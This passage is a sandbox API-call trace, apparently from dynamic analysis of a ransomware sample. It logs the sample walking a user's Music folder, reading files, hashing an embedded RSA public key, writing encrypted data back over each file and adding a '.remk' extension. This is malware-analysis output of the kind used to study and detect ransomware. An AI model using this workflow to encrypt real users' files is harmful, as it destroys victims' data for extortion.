lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.149] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.149] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.149] CloseHandle (hObject=0x640) returned 1 [0234.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bc408 [0234.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0234.150] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\6E50reyJxYm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\6e50reyjxym.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\6E50reyJxYm.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\6e50reyjxym.wav.remk")) returned 1 [0234.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.151] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0234.152] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a1e2d0, ftCreationTime.dwHighDateTime=0x1d5e762, ftLastAccessTime.dwLowDateTime=0x3d051030, ftLastAccessTime.dwHighDateTime=0x1d5e6ec, ftLastWriteTime.dwLowDateTime=0x3d051030, ftLastWriteTime.dwHighDateTime=0x1d5e6ec, nFileSizeHigh=0x0, nFileSizeLow=0xa483, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dbHnWPIPAcwCYg3Bdmu.mp3", cAlternateFileName="DBHNWP~1.MP3")) returned 1 [0234.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0234.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.152] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\dbHnWPIPAcwCYg3Bdmu.mp3") returned=".mp3" [0234.152] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\dbHnWPIPAcwCYg3Bdmu.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\dbhnwpipacwcyg3bdmu.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.153] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=42115) returned 1 [0234.153] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.155] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa45d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.155] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.157] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.157] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xa483, lpOverlapped=0x0) returned 1 [0234.158] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.158] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.158] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.158] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0234.159] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.159] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.159] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.159] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.159] GetLastError () returned 0x0 [0234.159] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.159] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.159] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.159] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.160] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa480) returned 0x37c4278 [0234.160] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbf60 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee640 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbfa8 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee658 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee688 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6e8 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6a0 [0234.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.161] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6e8 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee6a0 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee688 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.162] GetCurrentThreadId () returned 0x314 [0234.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2b90 [0234.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.162] GetCurrentThreadId () returned 0x314 [0234.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6e8 [0234.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee688 [0234.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6a0 [0234.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee670 [0234.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee700 [0234.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6d0 [0234.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6b8 [0234.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee718 [0234.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6b8 | out: hHeap=0x630000) returned 1 [0234.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee6b8 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee688 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee718 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee688 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6b8 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee700 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee670 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee658 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bbfa8 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.167] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0xa47e, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0xa47e, lpOverlapped=0x0) returned 1 [0234.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.167] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa483, 